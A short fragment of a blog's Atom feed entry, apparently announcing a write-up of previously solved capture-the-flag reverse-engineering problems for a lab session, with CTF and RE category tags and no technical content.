<h2 id="实验课写写之前做过的题叭"><a href="#实验课写写之前做过的题叭" class="headerlink" title="实验课写写之前做过的题叭"></a>Writing up some problems I did earlier, for the lab session</h2>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
</feed>